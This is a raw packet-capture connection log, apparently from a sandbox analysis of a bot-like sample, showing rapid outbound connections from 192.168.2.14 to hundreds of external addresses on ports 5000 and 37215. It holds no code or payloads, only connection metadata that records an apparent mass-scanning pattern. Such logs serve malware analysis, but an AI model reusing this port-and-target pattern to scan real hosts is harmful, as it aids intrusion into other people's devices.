                                                    Jul 10, 2024 08:26:10.915096045 CEST500048611184.181.69.214192.168.2.14
                                                    Jul 10, 2024 08:26:10.915111065 CEST500038316211.11.61.5192.168.2.14
                                                    Jul 10, 2024 08:26:10.915121078 CEST500048611184.245.171.59192.168.2.14
                                                    Jul 10, 2024 08:26:10.915132046 CEST500048611184.97.82.181192.168.2.14
                                                    Jul 10, 2024 08:26:10.916116953 CEST500048611184.179.8.120192.168.2.14
                                                    Jul 10, 2024 08:26:10.916131020 CEST500048611184.51.215.87192.168.2.14
                                                    Jul 10, 2024 08:26:10.916141033 CEST500048611184.25.167.251192.168.2.14
                                                    Jul 10, 2024 08:26:10.916150093 CEST500048611184.21.157.254192.168.2.14
                                                    Jul 10, 2024 08:26:10.916469097 CEST486115000192.168.2.14184.165.103.177
                                                    Jul 10, 2024 08:26:10.916469097 CEST486115000192.168.2.14184.140.130.144
                                                    Jul 10, 2024 08:26:10.916469097 CEST486115000192.168.2.14184.75.112.70
                                                    Jul 10, 2024 08:26:10.916469097 CEST582945000192.168.2.14211.31.243.23
                                                    Jul 10, 2024 08:26:10.916469097 CEST474265000192.168.2.14211.250.63.136
                                                    Jul 10, 2024 08:26:10.916469097 CEST391085000192.168.2.14211.170.38.105
                                                    Jul 10, 2024 08:26:10.916469097 CEST4708337215192.168.2.14157.106.12.61
                                                    Jul 10, 2024 08:26:10.916469097 CEST490025000192.168.2.14211.196.165.24
                                                    Jul 10, 2024 08:26:10.917155981 CEST500048611184.66.188.27192.168.2.14
                                                    Jul 10, 2024 08:26:10.917170048 CEST500048611184.195.194.1192.168.2.14
                                                    Jul 10, 2024 08:26:10.917179108 CEST500048611184.110.108.155192.168.2.14
                                                    Jul 10, 2024 08:26:10.918124914 CEST500048611184.63.168.198192.168.2.14
                                                    Jul 10, 2024 08:26:10.918138981 CEST500048611184.102.251.237192.168.2.14
                                                    Jul 10, 2024 08:26:10.918148041 CEST500048611184.151.165.241192.168.2.14
                                                    Jul 10, 2024 08:26:10.918157101 CEST500048611184.9.79.215192.168.2.14
                                                    Jul 10, 2024 08:26:10.919090033 CEST500048611184.180.254.42192.168.2.14
                                                    Jul 10, 2024 08:26:10.919111013 CEST500048611184.212.211.237192.168.2.14
                                                    Jul 10, 2024 08:26:10.919121981 CEST500048611184.112.77.232192.168.2.14
                                                    Jul 10, 2024 08:26:10.919131041 CEST500040018211.183.218.59192.168.2.14
                                                    Jul 10, 2024 08:26:10.919341087 CEST486115000192.168.2.14184.115.229.199
                                                    Jul 10, 2024 08:26:10.919341087 CEST520765000192.168.2.14211.63.136.48
                                                    Jul 10, 2024 08:26:10.919341087 CEST362645000192.168.2.14211.96.207.168
                                                    Jul 10, 2024 08:26:10.919341087 CEST602765000192.168.2.14211.43.12.177
                                                    Jul 10, 2024 08:26:10.919341087 CEST347645000192.168.2.14211.23.9.57
                                                    Jul 10, 2024 08:26:10.919341087 CEST531225000192.168.2.14211.145.32.60
                                                    Jul 10, 2024 08:26:10.919341087 CEST365685000192.168.2.14211.246.39.155
                                                    Jul 10, 2024 08:26:10.919341087 CEST4708337215192.168.2.1441.102.118.102
                                                    Jul 10, 2024 08:26:10.919940948 CEST500048611184.70.148.152192.168.2.14
                                                    Jul 10, 2024 08:26:10.919954062 CEST500048611184.250.164.206192.168.2.14
                                                    Jul 10, 2024 08:26:10.919964075 CEST500044612211.167.214.151192.168.2.14
                                                    Jul 10, 2024 08:26:10.919972897 CEST500048611184.167.228.176192.168.2.14
                                                    Jul 10, 2024 08:26:10.920150995 CEST500048611184.242.142.248192.168.2.14
                                                    Jul 10, 2024 08:26:10.920335054 CEST486115000192.168.2.14184.121.93.229
                                                    Jul 10, 2024 08:26:10.920335054 CEST486115000192.168.2.14184.154.77.8
                                                    Jul 10, 2024 08:26:10.920335054 CEST486115000192.168.2.14184.67.23.42
                                                    Jul 10, 2024 08:26:10.920335054 CEST486115000192.168.2.14184.86.114.93
                                                    Jul 10, 2024 08:26:10.920335054 CEST486115000192.168.2.14184.189.39.60
                                                    Jul 10, 2024 08:26:10.920335054 CEST486115000192.168.2.14184.186.163.159
                                                    Jul 10, 2024 08:26:10.920335054 CEST486115000192.168.2.14184.197.192.164
                                                    Jul 10, 2024 08:26:10.920335054 CEST486115000192.168.2.14184.177.95.155
                                                    Jul 10, 2024 08:26:10.921231031 CEST500048611184.161.163.28192.168.2.14
                                                    Jul 10, 2024 08:26:10.921242952 CEST500048611184.193.152.119192.168.2.14
                                                    Jul 10, 2024 08:26:10.921252012 CEST500048611184.10.183.245192.168.2.14
                                                    Jul 10, 2024 08:26:10.921261072 CEST500048611184.157.3.200192.168.2.14
                                                    Jul 10, 2024 08:26:10.921911001 CEST486115000192.168.2.14184.19.106.88
                                                    Jul 10, 2024 08:26:10.921911001 CEST486115000192.168.2.14184.237.124.223
                                                    Jul 10, 2024 08:26:10.921911001 CEST486115000192.168.2.14184.106.219.17
                                                    Jul 10, 2024 08:26:10.921911001 CEST486115000192.168.2.14184.226.5.42
                                                    Jul 10, 2024 08:26:10.921911001 CEST486115000192.168.2.14184.32.161.2
                                                    Jul 10, 2024 08:26:10.921911001 CEST486115000192.168.2.14184.86.4.53
                                                    Jul 10, 2024 08:26:10.921911001 CEST486115000192.168.2.14184.135.220.159
                                                    Jul 10, 2024 08:26:10.921911001 CEST486115000192.168.2.14184.164.76.69
                                                    Jul 10, 2024 08:26:10.922523022 CEST500048611184.74.92.3192.168.2.14
                                                    Jul 10, 2024 08:26:10.922535896 CEST500048611184.97.135.55192.168.2.14
                                                    Jul 10, 2024 08:26:10.922545910 CEST500048611184.165.103.177192.168.2.14
                                                    Jul 10, 2024 08:26:10.922555923 CEST500036208211.16.163.159192.168.2.14
                                                    Jul 10, 2024 08:26:10.922569036 CEST4708337215192.168.2.1427.57.166.151
                                                    Jul 10, 2024 08:26:10.922569036 CEST449245000192.168.2.14211.136.205.137
                                                    Jul 10, 2024 08:26:10.922569036 CEST443665000192.168.2.14211.133.219.103
                                                    Jul 10, 2024 08:26:10.922569036 CEST396145000192.168.2.14211.181.216.185
                                                    Jul 10, 2024 08:26:10.922569036 CEST571345000192.168.2.14211.127.237.133
                                                    Jul 10, 2024 08:26:10.922569036 CEST517445000192.168.2.14211.30.33.166
                                                    Jul 10, 2024 08:26:10.922569036 CEST504465000192.168.2.14211.242.20.220
                                                    Jul 10, 2024 08:26:10.922569036 CEST411885000192.168.2.14211.189.104.224
                                                    Jul 10, 2024 08:26:10.923681974 CEST500048611184.195.238.53192.168.2.14
                                                    Jul 10, 2024 08:26:10.923702955 CEST500048611184.140.130.144192.168.2.14
                                                    Jul 10, 2024 08:26:10.923712969 CEST500048611184.203.215.36192.168.2.14
                                                    Jul 10, 2024 08:26:10.923721075 CEST500048611184.36.88.160192.168.2.14
                                                    Jul 10, 2024 08:26:10.924143076 CEST500048611184.88.155.200192.168.2.14
                                                    Jul 10, 2024 08:26:10.925375938 CEST500048611184.138.174.164192.168.2.14
                                                    Jul 10, 2024 08:26:10.925390005 CEST500048611184.93.228.93192.168.2.14
                                                    Jul 10, 2024 08:26:10.925400019 CEST500048611184.208.189.0192.168.2.14
                                                    Jul 10, 2024 08:26:10.925410032 CEST500048611184.9.171.1192.168.2.14
                                                    Jul 10, 2024 08:26:10.925451040 CEST4708337215192.168.2.14197.124.185.106
                                                    Jul 10, 2024 08:26:10.925451040 CEST486115000192.168.2.14184.176.175.3
                                                    Jul 10, 2024 08:26:10.925451040 CEST486115000192.168.2.14184.147.160.94
                                                    Jul 10, 2024 08:26:10.925451040 CEST486115000192.168.2.14184.138.189.198
                                                    Jul 10, 2024 08:26:10.925451040 CEST416145000192.168.2.14211.32.165.175
                                                    Jul 10, 2024 08:26:10.925451040 CEST569065000192.168.2.14211.190.220.227
                                                    Jul 10, 2024 08:26:10.925451040 CEST385805000192.168.2.14211.163.223.25
                                                    Jul 10, 2024 08:26:10.925451040 CEST443045000192.168.2.14211.232.24.44
                                                    Jul 10, 2024 08:26:10.925930977 CEST500048611184.115.229.199192.168.2.14
                                                    Jul 10, 2024 08:26:10.925945044 CEST500048611184.24.192.226192.168.2.14
                                                    Jul 10, 2024 08:26:10.925954103 CEST500048611184.121.93.229192.168.2.14
                                                    Jul 10, 2024 08:26:10.927026033 CEST500052076211.63.136.48192.168.2.14
                                                    Jul 10, 2024 08:26:10.927038908 CEST500048611184.33.2.30192.168.2.14
                                                    Jul 10, 2024 08:26:10.927048922 CEST500048611184.235.108.91192.168.2.14
                                                    Jul 10, 2024 08:26:10.928442955 CEST500048611184.113.98.209192.168.2.14
                                                    Jul 10, 2024 08:26:10.928457022 CEST500048611184.58.45.242192.168.2.14
                                                    Jul 10, 2024 08:26:10.928467035 CEST500051334211.206.8.183192.168.2.14
                                                    Jul 10, 2024 08:26:10.928477049 CEST500048611184.75.112.70192.168.2.14
                                                    Jul 10, 2024 08:26:10.928498030 CEST500048611184.147.37.70192.168.2.14
                                                    Jul 10, 2024 08:26:10.928509951 CEST500048611184.154.77.8192.168.2.14
                                                    Jul 10, 2024 08:26:10.929306984 CEST486115000192.168.2.14184.225.119.82
                                                    Jul 10, 2024 08:26:10.929306984 CEST486115000192.168.2.14184.53.111.46
                                                    Jul 10, 2024 08:26:10.929306984 CEST486115000192.168.2.14184.180.44.195
                                                    Jul 10, 2024 08:26:10.929307938 CEST486115000192.168.2.14184.24.210.69
                                                    Jul 10, 2024 08:26:10.929307938 CEST486115000192.168.2.14184.222.47.41
                                                    Jul 10, 2024 08:26:10.929307938 CEST486115000192.168.2.14184.179.114.54
                                                    Jul 10, 2024 08:26:10.929307938 CEST486115000192.168.2.14184.62.174.236
                                                    Jul 10, 2024 08:26:10.929307938 CEST486115000192.168.2.14184.111.229.119
                                                    Jul 10, 2024 08:26:10.929642916 CEST500048611184.214.58.151192.168.2.14
                                                    Jul 10, 2024 08:26:10.929655075 CEST500048611184.67.23.42192.168.2.14
                                                    Jul 10, 2024 08:26:10.929663897 CEST500048611184.19.106.88192.168.2.14
                                                    Jul 10, 2024 08:26:10.929676056 CEST500048611184.84.212.39192.168.2.14
                                                    Jul 10, 2024 08:26:10.930074930 CEST500048611184.237.124.223192.168.2.14
                                                    Jul 10, 2024 08:26:10.930088043 CEST500048611184.115.49.40192.168.2.14
                                                    Jul 10, 2024 08:26:10.930098057 CEST500048611184.106.219.17192.168.2.14
                                                    Jul 10, 2024 08:26:10.931058884 CEST500048611184.229.42.36192.168.2.14
                                                    Jul 10, 2024 08:26:10.931071043 CEST500048611184.100.221.159192.168.2.14
                                                    Jul 10, 2024 08:26:10.931080103 CEST500048611184.86.114.93192.168.2.14
                                                    Jul 10, 2024 08:26:10.931149006 CEST486115000192.168.2.14184.16.229.27
                                                    Jul 10, 2024 08:26:10.931149006 CEST4708337215192.168.2.14157.80.242.92
                                                    Jul 10, 2024 08:26:10.931149006 CEST486115000192.168.2.14184.153.157.218
                                                    Jul 10, 2024 08:26:10.931149006 CEST486115000192.168.2.14184.210.29.80
                                                    Jul 10, 2024 08:26:10.931149006 CEST486115000192.168.2.14184.183.223.112
                                                    Jul 10, 2024 08:26:10.931149006 CEST486115000192.168.2.14184.120.68.227
                                                    Jul 10, 2024 08:26:10.931149006 CEST486115000192.168.2.14184.224.82.213
                                                    Jul 10, 2024 08:26:10.931149006 CEST486115000192.168.2.14184.154.231.141
                                                    Jul 10, 2024 08:26:10.931879997 CEST486115000192.168.2.14184.25.95.154
                                                    Jul 10, 2024 08:26:10.931879997 CEST486115000192.168.2.14184.161.233.204
                                                    Jul 10, 2024 08:26:10.931879997 CEST486115000192.168.2.14184.214.228.23
                                                    Jul 10, 2024 08:26:10.931879997 CEST514205000192.168.2.14211.22.205.247
                                                    Jul 10, 2024 08:26:10.931879997 CEST4708337215192.168.2.1441.11.171.247
                                                    Jul 10, 2024 08:26:10.931879997 CEST565785000192.168.2.14211.86.96.210
                                                    Jul 10, 2024 08:26:10.931879997 CEST359165000192.168.2.14211.72.91.0
                                                    Jul 10, 2024 08:26:10.931879997 CEST568625000192.168.2.14211.77.143.57
                                                    Jul 10, 2024 08:26:10.932157040 CEST500036264211.96.207.168192.168.2.14
                                                    Jul 10, 2024 08:26:10.932169914 CEST500048611184.226.5.42192.168.2.14
                                                    Jul 10, 2024 08:26:10.932288885 CEST500048611184.119.137.43192.168.2.14
                                                    Jul 10, 2024 08:26:10.932301044 CEST500060276211.43.12.177192.168.2.14
                                                    Jul 10, 2024 08:26:10.932708025 CEST500048611184.189.39.60192.168.2.14
                                                    Jul 10, 2024 08:26:10.934053898 CEST500048611184.33.117.200192.168.2.14
                                                    Jul 10, 2024 08:26:10.934068918 CEST500058294211.31.243.23192.168.2.14
                                                    Jul 10, 2024 08:26:10.934077978 CEST500044924211.136.205.137192.168.2.14
                                                    Jul 10, 2024 08:26:10.934088945 CEST500048611184.186.163.159192.168.2.14
                                                    Jul 10, 2024 08:26:10.934948921 CEST500048611184.189.77.233192.168.2.14
                                                    Jul 10, 2024 08:26:10.934962034 CEST500048611184.225.119.82192.168.2.14
                                                    Jul 10, 2024 08:26:10.934972048 CEST500048611184.32.161.2192.168.2.14
                                                    Jul 10, 2024 08:26:10.935658932 CEST500044366211.133.219.103192.168.2.14
                                                    Jul 10, 2024 08:26:10.935671091 CEST500047426211.250.63.136192.168.2.14
                                                    Jul 10, 2024 08:26:10.935682058 CEST500039614211.181.216.185192.168.2.14
                                                    Jul 10, 2024 08:26:10.936104059 CEST545645000192.168.2.14211.24.77.188
                                                    Jul 10, 2024 08:26:10.936104059 CEST341045000192.168.2.14211.38.179.111
                                                    Jul 10, 2024 08:26:10.936104059 CEST578365000192.168.2.14211.14.164.58
                                                    Jul 10, 2024 08:26:10.936104059 CEST389625000192.168.2.14211.225.79.20
                                                    Jul 10, 2024 08:26:10.936104059 CEST4708337215192.168.2.14197.139.124.40
                                                    Jul 10, 2024 08:26:10.936104059 CEST549145000192.168.2.14211.158.208.229
                                                    Jul 10, 2024 08:26:10.936104059 CEST480905000192.168.2.14211.174.61.167
                                                    Jul 10, 2024 08:26:10.936104059 CEST520445000192.168.2.14211.194.237.167
                                                    Jul 10, 2024 08:26:10.936156988 CEST500034764211.23.9.57192.168.2.14
                                                    Jul 10, 2024 08:26:10.936168909 CEST500048611184.73.5.92192.168.2.14
                                                    Jul 10, 2024 08:26:10.936803102 CEST500048611184.197.192.164192.168.2.14
                                                    Jul 10, 2024 08:26:10.936815977 CEST500053122211.145.32.60192.168.2.14
                                                    Jul 10, 2024 08:26:10.936825991 CEST500048611184.177.95.155192.168.2.14
                                                    Jul 10, 2024 08:26:10.937684059 CEST500048611184.16.229.27192.168.2.14
                                                    Jul 10, 2024 08:26:10.937696934 CEST500048611184.25.95.154192.168.2.14
                                                    Jul 10, 2024 08:26:10.937706947 CEST500048611184.53.111.46192.168.2.14
                                                    Jul 10, 2024 08:26:10.939008951 CEST500048611184.176.175.3192.168.2.14
                                                    Jul 10, 2024 08:26:10.939023018 CEST500048611184.86.4.53192.168.2.14
                                                    Jul 10, 2024 08:26:10.939033031 CEST500048611184.161.233.204192.168.2.14
                                                    Jul 10, 2024 08:26:10.939043999 CEST500048611184.147.160.94192.168.2.14
                                                    Jul 10, 2024 08:26:10.939049006 CEST486115000192.168.2.14184.204.215.111
                                                    Jul 10, 2024 08:26:10.939049006 CEST486115000192.168.2.14184.151.65.122
                                                    Jul 10, 2024 08:26:10.939049006 CEST486115000192.168.2.14184.130.126.217
                                                    Jul 10, 2024 08:26:10.939049006 CEST486115000192.168.2.14184.90.208.217
                                                    Jul 10, 2024 08:26:10.939049006 CEST486115000192.168.2.14184.45.24.105
                                                    Jul 10, 2024 08:26:10.939049006 CEST486115000192.168.2.14184.87.199.84
                                                    Jul 10, 2024 08:26:10.939049006 CEST486115000192.168.2.14184.61.245.139
                                                    Jul 10, 2024 08:26:10.939049006 CEST486115000192.168.2.14184.242.110.79
                                                    Jul 10, 2024 08:26:10.939719915 CEST4708337215192.168.2.1459.210.209.207
                                                    Jul 10, 2024 08:26:10.939719915 CEST4708337215192.168.2.14128.238.178.148
                                                    Jul 10, 2024 08:26:10.939719915 CEST4708337215192.168.2.14157.14.86.197
                                                    Jul 10, 2024 08:26:10.939719915 CEST4708337215192.168.2.14122.231.87.71
                                                    Jul 10, 2024 08:26:10.939719915 CEST4708337215192.168.2.1441.190.138.47
                                                    Jul 10, 2024 08:26:10.939719915 CEST4708337215192.168.2.14157.161.170.28
                                                    Jul 10, 2024 08:26:10.939719915 CEST4708337215192.168.2.14197.81.85.133
                                                    Jul 10, 2024 08:26:10.939719915 CEST4708337215192.168.2.1441.18.142.225
                                                    Jul 10, 2024 08:26:10.939919949 CEST500048611184.180.44.195192.168.2.14
                                                    Jul 10, 2024 08:26:10.939933062 CEST500036568211.246.39.155192.168.2.14
                                                    Jul 10, 2024 08:26:10.939943075 CEST500048611184.214.228.23192.168.2.14
                                                    Jul 10, 2024 08:26:10.940139055 CEST500048611184.153.157.218192.168.2.14
                                                    Jul 10, 2024 08:26:10.941155910 CEST486115000192.168.2.14184.207.209.212
                                                    Jul 10, 2024 08:26:10.941155910 CEST486115000192.168.2.14184.53.147.124
                                                    Jul 10, 2024 08:26:10.941155910 CEST486115000192.168.2.14184.73.11.164
                                                    Jul 10, 2024 08:26:10.941155910 CEST486115000192.168.2.14184.185.143.100
                                                    Jul 10, 2024 08:26:10.941157103 CEST486115000192.168.2.14184.159.60.182
                                                    Jul 10, 2024 08:26:10.941157103 CEST486115000192.168.2.14184.168.229.31
                                                    Jul 10, 2024 08:26:10.941157103 CEST486115000192.168.2.14184.78.57.22
                                                    Jul 10, 2024 08:26:10.941157103 CEST486115000192.168.2.14184.61.218.28
                                                    Jul 10, 2024 08:26:10.941313982 CEST500057134211.127.237.133192.168.2.14
                                                    Jul 10, 2024 08:26:10.941327095 CEST500051420211.22.205.247192.168.2.14
                                                    Jul 10, 2024 08:26:10.941335917 CEST500048611184.135.220.159192.168.2.14
                                                    Jul 10, 2024 08:26:10.941898108 CEST500039108211.170.38.105192.168.2.14
                                                    Jul 10, 2024 08:26:10.941910982 CEST500048611184.24.210.69192.168.2.14
                                                    Jul 10, 2024 08:26:10.941920996 CEST500051744211.30.33.166192.168.2.14
                                                    Jul 10, 2024 08:26:10.943130970 CEST359465000192.168.2.14211.48.136.37
                                                    Jul 10, 2024 08:26:10.943130970 CEST607685000192.168.2.14211.219.2.156
                                                    Jul 10, 2024 08:26:10.943130970 CEST396245000192.168.2.14211.60.246.244
                                                    Jul 10, 2024 08:26:10.943130970 CEST446585000192.168.2.14211.167.96.239
                                                    Jul 10, 2024 08:26:10.943130970 CEST595045000192.168.2.14211.46.107.127
                                                    Jul 10, 2024 08:26:10.943130970 CEST558545000192.168.2.14211.90.129.39
                                                    Jul 10, 2024 08:26:10.943130970 CEST425625000192.168.2.14211.77.167.114
                                                    Jul 10, 2024 08:26:10.943130970 CEST608965000192.168.2.14211.63.220.104
                                                    Jul 10, 2024 08:26:10.943458080 CEST500054564211.24.77.188192.168.2.14
                                                    Jul 10, 2024 08:26:10.943483114 CEST500050446211.242.20.220192.168.2.14
                                                    Jul 10, 2024 08:26:10.943492889 CEST500034104211.38.179.111192.168.2.14
                                                    Jul 10, 2024 08:26:10.944050074 CEST500048611184.222.47.41192.168.2.14
                                                    Jul 10, 2024 08:26:10.944062948 CEST500048611184.164.76.69192.168.2.14
                                                    Jul 10, 2024 08:26:10.944072962 CEST500048611184.179.114.54192.168.2.14
                                                    Jul 10, 2024 08:26:10.945135117 CEST486115000192.168.2.14184.214.208.104
                                                    Jul 10, 2024 08:26:10.945135117 CEST486115000192.168.2.14184.166.48.51
                                                    Jul 10, 2024 08:26:10.945135117 CEST486115000192.168.2.14184.184.109.74
                                                    Jul 10, 2024 08:26:10.945135117 CEST4708337215192.168.2.1441.173.140.46
                                                    Jul 10, 2024 08:26:10.945135117 CEST486115000192.168.2.14184.133.217.131
                                                    Jul 10, 2024 08:26:10.945135117 CEST459865000192.168.2.14211.91.5.102
                                                    Jul 10, 2024 08:26:10.945135117 CEST380065000192.168.2.14211.134.171.239
                                                    Jul 10, 2024 08:26:10.945135117 CEST4708337215192.168.2.1464.0.169.67
                                                    Jul 10, 2024 08:26:10.945172071 CEST500048611184.204.215.111192.168.2.14
                                                    Jul 10, 2024 08:26:10.945194960 CEST500041188211.189.104.224192.168.2.14
                                                    Jul 10, 2024 08:26:10.945633888 CEST500048611184.210.29.80192.168.2.14
                                                    Jul 10, 2024 08:26:10.945646048 CEST500048611184.151.65.122192.168.2.14
                                                    Jul 10, 2024 08:26:10.945656061 CEST500048611184.62.174.236192.168.2.14
                                                    Jul 10, 2024 08:26:10.946800947 CEST542545000192.168.2.14211.48.53.157
                                                    Jul 10, 2024 08:26:10.946800947 CEST353025000192.168.2.14211.128.126.95
                                                    Jul 10, 2024 08:26:10.946800947 CEST4708337215192.168.2.14197.163.37.4
                                                    Jul 10, 2024 08:26:10.946800947 CEST370925000192.168.2.14211.239.232.109
                                                    Jul 10, 2024 08:26:10.946800947 CEST334245000192.168.2.14211.58.133.2
                                                    Jul 10, 2024 08:26:10.946800947 CEST510585000192.168.2.14211.5.18.15
                                                    Jul 10, 2024 08:26:10.946800947 CEST4708337215192.168.2.14157.0.35.240
                                                    Jul 10, 2024 08:26:10.946800947 CEST4708337215192.168.2.14197.198.94.102
                                                    Jul 10, 2024 08:26:10.947055101 CEST444285000192.168.2.14211.116.83.199
                                                    Jul 10, 2024 08:26:10.947055101 CEST458765000192.168.2.14211.149.49.75
                                                    Jul 10, 2024 08:26:10.947055101 CEST401725000192.168.2.14211.109.239.189
                                                    Jul 10, 2024 08:26:10.947055101 CEST583685000192.168.2.14211.201.147.57
                                                    Jul 10, 2024 08:26:10.947055101 CEST451225000192.168.2.14211.248.86.121
                                                    Jul 10, 2024 08:26:10.947055101 CEST348025000192.168.2.14211.255.136.8
                                                    Jul 10, 2024 08:26:10.947055101 CEST4708337215192.168.2.14157.189.169.10
                                                    Jul 10, 2024 08:26:10.947055101 CEST405805000192.168.2.14211.73.23.60
                                                    Jul 10, 2024 08:26:10.947225094 CEST500048611184.111.229.119192.168.2.14
                                                    Jul 10, 2024 08:26:10.947238922 CEST500048611184.207.209.212192.168.2.14
                                                    Jul 10, 2024 08:26:10.947626114 CEST500048611184.53.147.124192.168.2.14
                                                    Jul 10, 2024 08:26:10.947648048 CEST500048611184.138.189.198192.168.2.14
                                                    Jul 10, 2024 08:26:10.948121071 CEST500048611184.130.126.217192.168.2.14
                                                    Jul 10, 2024 08:26:10.948132992 CEST500049002211.196.165.24192.168.2.14
                                                    Jul 10, 2024 08:26:10.948143959 CEST500041614211.32.165.175192.168.2.14
                                                    Jul 10, 2024 08:26:10.949099064 CEST500048611184.183.223.112192.168.2.14
                                                    Jul 10, 2024 08:26:10.949114084 CEST500057836211.14.164.58192.168.2.14
                                                    Jul 10, 2024 08:26:10.949122906 CEST500048611184.120.68.227192.168.2.14
                                                    Jul 10, 2024 08:26:10.949878931 CEST500038962211.225.79.20192.168.2.14
                                                    Jul 10, 2024 08:26:10.949891090 CEST500048611184.224.82.213192.168.2.14
                                                    Jul 10, 2024 08:26:10.949899912 CEST500048611184.154.231.141192.168.2.14
                                                    Jul 10, 2024 08:26:10.950752974 CEST500054914211.158.208.229192.168.2.14
                                                    Jul 10, 2024 08:26:10.950764894 CEST500056578211.86.96.210192.168.2.14
                                                    Jul 10, 2024 08:26:10.950773954 CEST500048611184.90.208.217192.168.2.14
                                                    Jul 10, 2024 08:26:10.951524973 CEST500048090211.174.61.167192.168.2.14
                                                    Jul 10, 2024 08:26:10.951541901 CEST500035916211.72.91.0192.168.2.14
                                                    Jul 10, 2024 08:26:10.951553106 CEST500052044211.194.237.167192.168.2.14
                                                    Jul 10, 2024 08:26:10.952147961 CEST500056862211.77.143.57192.168.2.14
                                                    Jul 10, 2024 08:26:10.952869892 CEST4708337215192.168.2.1441.209.73.122
                                                    Jul 10, 2024 08:26:10.952869892 CEST426165000192.168.2.14211.6.64.246
                                                    Jul 10, 2024 08:26:10.952869892 CEST395345000192.168.2.14211.29.186.247
                                                    Jul 10, 2024 08:26:10.952869892 CEST473625000192.168.2.14211.244.223.137
                                                    Jul 10, 2024 08:26:10.952869892 CEST419525000192.168.2.14211.90.109.104
                                                    Jul 10, 2024 08:26:10.952869892 CEST372325000192.168.2.14211.223.182.146
                                                    Jul 10, 2024 08:26:10.952869892 CEST481805000192.168.2.14211.76.220.216
                                                    Jul 10, 2024 08:26:10.952869892 CEST605925000192.168.2.14211.76.74.243
                                                    Jul 10, 2024 08:26:10.952996016 CEST500035946211.48.136.37192.168.2.14
                                                    Jul 10, 2024 08:26:10.953008890 CEST500044428211.116.83.199192.168.2.14
                                                    Jul 10, 2024 08:26:10.953020096 CEST500054254211.48.53.157192.168.2.14
                                                    Jul 10, 2024 08:26:10.953030109 CEST500048611184.214.208.104192.168.2.14
                                                    Jul 10, 2024 08:26:10.953819036 CEST486115000192.168.2.14184.119.238.62
                                                    Jul 10, 2024 08:26:10.953819990 CEST486115000192.168.2.14184.215.28.192
                                                    Jul 10, 2024 08:26:10.953819990 CEST486115000192.168.2.14184.9.164.239
                                                    Jul 10, 2024 08:26:10.953819990 CEST486115000192.168.2.14184.116.16.238
                                                    Jul 10, 2024 08:26:10.953819990 CEST4708337215192.168.2.1441.228.165.184
                                                    Jul 10, 2024 08:26:10.953819990 CEST4708337215192.168.2.1441.144.102.136
                                                    Jul 10, 2024 08:26:10.953819990 CEST486115000192.168.2.14184.151.120.165
                                                    Jul 10, 2024 08:26:10.953819990 CEST486115000192.168.2.14184.231.176.101
                                                    Jul 10, 2024 08:26:10.954401970 CEST500060768211.219.2.156192.168.2.14
                                                    Jul 10, 2024 08:26:10.954416037 CEST500048611184.166.48.51192.168.2.14
                                                    Jul 10, 2024 08:26:10.954426050 CEST500048611184.45.24.105192.168.2.14
                                                    Jul 10, 2024 08:26:10.954435110 CEST500048611184.184.109.74192.168.2.14
                                                    Jul 10, 2024 08:26:10.954716921 CEST4708337215192.168.2.1441.243.103.140
                                                    Jul 10, 2024 08:26:10.954716921 CEST4708337215192.168.2.14157.26.1.15
                                                    Jul 10, 2024 08:26:10.954716921 CEST5201637215192.168.2.14157.8.45.235
                                                    Jul 10, 2024 08:26:10.954718113 CEST4708337215192.168.2.1441.114.129.43
                                                    Jul 10, 2024 08:26:10.954718113 CEST4708337215192.168.2.14197.126.193.52
                                                    Jul 10, 2024 08:26:10.954718113 CEST4708337215192.168.2.14197.254.222.217
                                                    Jul 10, 2024 08:26:10.954718113 CEST4708337215192.168.2.14157.229.192.130
                                                    Jul 10, 2024 08:26:10.954718113 CEST4708337215192.168.2.14197.4.110.70
                                                    Jul 10, 2024 08:26:10.955833912 CEST500056906211.190.220.227192.168.2.14
                                                    Jul 10, 2024 08:26:10.955847979 CEST500045876211.149.49.75192.168.2.14
                                                    Jul 10, 2024 08:26:10.955857992 CEST500048611184.73.11.164192.168.2.14
                                                    Jul 10, 2024 08:26:10.955868006 CEST500048611184.87.199.84192.168.2.14
                                                    Jul 10, 2024 08:26:10.956141949 CEST500048611184.185.143.100192.168.2.14
                                                    Jul 10, 2024 08:26:10.956959963 CEST500039624211.60.246.244192.168.2.14
                                                    Jul 10, 2024 08:26:10.956973076 CEST500048611184.159.60.182192.168.2.14
                                                    Jul 10, 2024 08:26:10.956981897 CEST500044658211.167.96.239192.168.2.14
                                                    Jul 10, 2024 08:26:10.956991911 CEST500048611184.61.245.139192.168.2.14
                                                    Jul 10, 2024 08:26:10.957750082 CEST500038580211.163.223.25192.168.2.14
                                                    Jul 10, 2024 08:26:10.957762003 CEST500044304211.232.24.44192.168.2.14
                                                    Jul 10, 2024 08:26:10.957772017 CEST500059504211.46.107.127192.168.2.14
                                                    Jul 10, 2024 08:26:10.958137035 CEST462105000192.168.2.14211.5.175.212
                                                    Jul 10, 2024 08:26:10.958137989 CEST335785000192.168.2.14211.26.137.212
                                                    Jul 10, 2024 08:26:10.958137989 CEST427585000192.168.2.14211.205.65.39
                                                    Jul 10, 2024 08:26:10.958137989 CEST355045000192.168.2.14211.39.49.194
                                                    Jul 10, 2024 08:26:10.958137989 CEST356605000192.168.2.14211.87.194.245
                                                    Jul 10, 2024 08:26:10.958137989 CEST487005000192.168.2.14211.41.148.119
                                                    Jul 10, 2024 08:26:10.958137989 CEST511105000192.168.2.14211.218.23.159
                                                    Jul 10, 2024 08:26:10.958137989 CEST534565000192.168.2.14211.56.67.12
                                                    Jul 10, 2024 08:26:10.959065914 CEST500040172211.109.239.189192.168.2.14
                                                    Jul 10, 2024 08:26:10.959079981 CEST500048611184.242.110.79192.168.2.14
                                                    Jul 10, 2024 08:26:10.959089994 CEST3721547083197.81.85.133192.168.2.14
                                                    Jul 10, 2024 08:26:10.959098101 CEST500048611184.168.229.31192.168.2.14
                                                    Jul 10, 2024 08:26:10.959671021 CEST500048611184.119.238.62192.168.2.14
                                                    Jul 10, 2024 08:26:10.959682941 CEST372154708341.18.142.225192.168.2.14
                                                    Jul 10, 2024 08:26:10.959696054 CEST500055854211.90.129.39192.168.2.14
                                                    Jul 10, 2024 08:26:10.960149050 CEST500042562211.77.167.114192.168.2.14
                                                    Jul 10, 2024 08:26:10.961055040 CEST388105000192.168.2.14211.134.68.37
                                                    Jul 10, 2024 08:26:10.961055040 CEST451445000192.168.2.14211.107.33.149
                                                    Jul 10, 2024 08:26:10.961055040 CEST565245000192.168.2.14211.116.200.199
                                                    Jul 10, 2024 08:26:10.961055040 CEST609045000192.168.2.14211.203.200.213
                                                    Jul 10, 2024 08:26:10.961055040 CEST583945000192.168.2.14211.89.57.243
